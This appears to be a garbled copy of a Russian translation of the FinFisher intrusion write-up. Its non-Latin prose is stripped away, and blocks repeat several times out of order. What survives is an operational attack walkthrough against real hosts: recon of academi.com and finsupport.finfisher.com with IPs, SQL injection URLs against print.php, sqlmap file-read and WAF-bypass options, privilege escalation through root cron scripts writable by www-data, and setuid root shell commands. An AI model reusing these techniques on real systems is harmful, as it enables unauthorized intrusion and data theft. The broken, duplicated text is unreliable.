https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

